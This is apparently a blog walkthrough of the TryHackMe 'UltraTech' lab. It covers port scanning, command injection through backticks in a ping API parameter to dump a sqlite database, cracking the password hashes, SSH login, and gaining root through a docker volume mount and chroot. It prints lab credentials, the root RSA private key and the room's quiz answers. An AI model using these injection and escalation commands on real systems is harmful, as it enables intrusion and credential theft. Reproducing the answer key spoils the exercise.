Tryhackme - UltraTech

Tryhackme – UltraTech

In this walk through, we will be going through the UltraTech room from Tryhackme. This room is rated as Medium on the platform and we have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information we have is the company’s name and their server’s IP address. So, let’s get started without any delay.

UltraTech

Machine Info:

TitleUltratech-latest
IPaddress10.10.224.181
DifficultyMedium
ObjectiveYou have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information you have. is the company’s name and their server’s IP address.

Enumeration:

  • Started with a regular nmap, followed by a scan that covers all the TCP ports out there along with the services running on them. As a result found 4 ports and services running – FTP (21), SSH (22), 8081 (blackice-icecap) and 31331 (HTTP).

$ sudo nmap -sS -sV 10.10.224.181 

Nmap scan report for 10.10.224.181
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

nmap scan

wh1terose@fsociety:~$ sudo nmap -sS -T4 -p- 10.10.224.181 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-06 23:06 IST

Nmap scan report for 10.10.224.181
Host is up (0.20s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
53/tcp    filtered domain
8081/tcp  open     blackice-icecap
31331/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 530.64 seconds


wh1terose@fsociety:~$ sudo nmap -sV -p 21,22,8081,31331 10.10.224.181
Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-06 23:18 IST
Nmap scan report for 10.10.224.181
Host is up (0.20s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8081/tcp  open  http    Node.js Express framework
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

open ports

nmap scan

  • I tried to anonymous login on the FTP server however it failed.

ftp login attempt

  • Next i moved to the web facing application. Performed some directory bruteforcing to reveals robots.txt.

UltraTech

Who are we?

robots.txt

  • Moving along, gives us partners.html. The page holds a login form asking for credentials to proceed further.

utech_sitemap.txt

Private Partners Arena

  • Going along with the source code reveals /js/api.js gives us our two API endpoints.

api.js

Initial Access:

  • Next, we used both of the API endpoints to extract usernames and passwords from a misconfigured sqllite database.

wh1terose@fsociety:~/CTF/TryHackme/Ultratech$ curl -i 'http://10.10.224.181:8081/ping?ip=`ls`'
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 49
ETag: W/"31-HlSQypQjJ8bvYzsasjt4yTZkt90"
Date: Tue, 06 Jun 2023 18:26:57 GMT
Connection: keep-alive

ping: utech.db.sqlite: Name or service not known
wh1terose@fsociety:~/CTF/TryHackme/Ultratech$ curl -i 'http://10.10.224.181:8081/ping?ip=`cat%20utech.db.sqlite`'
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 147
ETag: W/"93-594eIY8lmtfDeu2ln6BdpbW24SI"
Date: Tue, 06 Jun 2023 18:29:48 GMT
Connection: keep-alive

���(r00tf357a0c52799563c7c7b76c1e7543a32)admin0d0ea5111e3c1def594c1684e3b9be84: Parameter string not correctly encoded

curl request

curl request

  • Use hashes.com to crack the hashes of the below hash. Later, used the same credentials to login into the server via SSH.

r00t: f357a0c52799563c7c7b76c1e7543a32 
admin: 0d0ea5111e3c1def594c1684e3b9be84

root password

  • r00t:n100906

ssh login

Privilege Escalation:

  • I imported linpeas to the target machine using wget from my local machine. Firing it shows a docker misconfiguration which we can leverage.

linpeas.sh

/usr/bin/gpg

docker shell

r00t@ultratech-prod:/tmp$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
bash                latest              495d6437fc1e        4 years ago         15.8MB
r00t@ultratech-prod:/tmp$ docker run -v /:/mnt --rm -it bash chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# whoami	
root
# 

root

  • Further, navigate to the user /root directory and found our final flag by peeking into the private key of the user.

# cd /root	
# ls -la
total 40
drwx------  6 root root 4096 Mar 22  2019 .
drwxr-xr-x 23 root root 4096 Mar 19  2019 ..
-rw-------  1 root root  844 Mar 22  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Mar 22  2019 .cache
drwx------  3 root root 4096 Mar 22  2019 .emacs.d
drwx------  3 root root 4096 Mar 22  2019 .gnupg
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root    0 Mar 22  2019 .python_history
drwx------  2 root root 4096 Mar 22  2019 .ssh
-rw-rw-rw-  1 root root  193 Mar 22  2019 private.txt
# cat private.txt
# Life and acomplishments of Alvaro Squalo - Tome I

Memoirs of the most successful digital nomdad finblocktech entrepreneur
in the world.

By himself.

## Chapter 1 - How I became successful

# cd .ssh
# ls -la
total 16
drwx------ 2 root root 4096 Mar 22  2019 .
drwx------ 6 root root 4096 Mar 22  2019 ..
-rw------- 1 root root    0 Mar 19  2019 authorized_keys
-rw------- 1 root root 1675 Mar 22  2019 id_rsa
-rw-r--r-- 1 root root  401 Mar 22  2019 id_rsa.pub
# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAuDSna2F3pO8vMOPJ4l2PwpLFqMpy1SWYaaREhio64iM65HSm
sIOfoEC+vvs9SRxy8yNBQ2bx2kLYqoZpDJOuTC4Y7VIb+3xeLjhmvtNQGofffkQA
jSMMlh1MG14fOInXKTRQF8hPBWKB38BPdlNgm7dR5PUGFWni15ucYgCGq1Utc5PP
NZVxika+pr/U0Ux4620MzJW899lDG6orIoJo739fmMyrQUjKRnp8xXBv/YezoF8D
hQaP7omtbyo0dczKGkeAVCe6ARh8woiVd2zz5SHDoeZLe1ln4KSbIL3EiMQMzOpc
jNn7oD+rqmh/ygoXL3yFRAowi+LFdkkS0gqgmwIDAQABAoIBACbTwm5Z7xQu7m2J
tiYmvoSu10cK1UWkVQn/fAojoKHF90XsaK5QMDdhLlOnNXXRr1Ecn0cLzfLJoE3h
YwcpodWg6dQsOIW740Yu0Ulr1TiiZzOANfWJ679Akag7IK2UMGwZAMDikfV6nBGD
wbwZOwXXkEWIeC3PUedMf5wQrFI0mG+mRwWFd06xl6FioC9gIpV4RaZT92nbGfoM
BWr8KszHw0t7Cp3CT2OBzL2XoMg/NWFU0iBEBg8n8fk67Y59m49xED7VgupK5Ad1
5neOFdep8rydYbFpVLw8sv96GN5tb/i5KQPC1uO64YuC5ZOyKE30jX4gjAC8rafg
o1macDECgYEA4fTHFz1uRohrRkZiTGzEp9VUPNonMyKYHi2FaSTU1Vmp6A0vbBWW
tnuyiubefzK5DyDEf2YdhEE7PJbMBjnCWQJCtOaSCz/RZ7ET9pAMvo4MvTFs3I97
eDM3HWDdrmrK1hTaOTmvbV8DM9sNqgJVsH24ztLBWRRU4gOsP4a76s0CgYEA0LK/
/kh/lkReyAurcu7F00fIn1hdTvqa8/wUYq5efHoZg8pba2j7Z8g9GVqKtMnFA0w6
t1KmELIf55zwFh3i5MmneUJo6gYSXx2AqvWsFtddLljAVKpbLBl6szq4wVejoDye
lEdFfTHlYaN2ieZADsbgAKs27/q/ZgNqZVI+CQcCgYAO3sYPcHqGZ8nviQhFEU9r
4C04B/9WbStnqQVDoynilJEK9XsueMk/Xyqj24e/BT6KkVR9MeI1ZvmYBjCNJFX2
96AeOaJY3S1RzqSKsHY2QDD0boFEjqjIg05YP5y3Ms4AgsTNyU8TOpKCYiMnEhpD
kDKOYe5Zh24Cpc07LQnG7QKBgCZ1WjYUzBY34TOCGwUiBSiLKOhcU02TluxxPpx0
v4q2wW7s4m3nubSFTOUYL0ljiT+zU3qm611WRdTbsc6RkVdR5d/NoiHGHqqSeDyI
6z6GT3CUAFVZ01VMGLVgk91lNgz4PszaWW7ZvAiDI/wDhzhx46Ob6ZLNpWm6JWgo
gLAPAoGAdCXCHyTfKI/80YMmdp/k11Wj4TQuZ6zgFtUorstRddYAGt8peW3xFqLn
MrOulVZcSUXnezTs3f8TCsH1Yk/2ue8+GmtlZe/3pHRBW0YJIAaHWg5k2I3hsdAz
bPB7E9hlrI0AconivYDzfpxfX+vovlP/DdNVub/EO7JSO+RAmqo=
-----END RSA PRIVATE KEY-----

id_rsa

Task 1 – Deploy the machine

Task 1 - Deploy the machine

Task 2 – It’s enumeration time!

Question 1 – Which software is using the port 8081?

Node.js

Question 2 – Which other non-standard port is used?

31331

Question 3 – Which software using this port?

Apache

Question 4 – Which GNU/Linux distribution seems to be used?

Ubuntu

Question 5 – The software using the port 8081 is a REST api, how many of its routes are used by the web application?

2

Task 2 - It's enumeration time!

Task 3 – Let the fun begin

Question 1 – There is a database lying around, what is its filename?

utech.db.sqlite

Question 2 – What is the first user’s password hash?

f357a0c52799563c7c7b76c1e7543a32

Question 3 – What is the password associated with this hash?

n100906

Task 3 - Let the fun begin

Task 4 – The root of all evil

Question 1 – What are the first 9 characters of the root user’s private SSH key?

MIIEogIBA

Task 4 - The root of all evil

Also Read: Tryhackme – Traffic Analysis Essentials

Conclusion:

Tryhackme - UltraTech

So that was “UltraTech” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, found the following ports opened – FTP (21), SSH (22), 8081 (blackice-icecap) and 31331 (HTTP). Next, we found directories in robots.txt and utech_sitemap.txt file. Over there, we found a portal named Private Partners Area. Checking the page source code reveals two API endpoints. Next, we used both of the API endpoints to extract usernames and passwords from a misconfigured sqllite database. Cracked the hashed password and logged into the server using SSH. At last for the privilege escalation used misconfigured docker instance to get the root. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top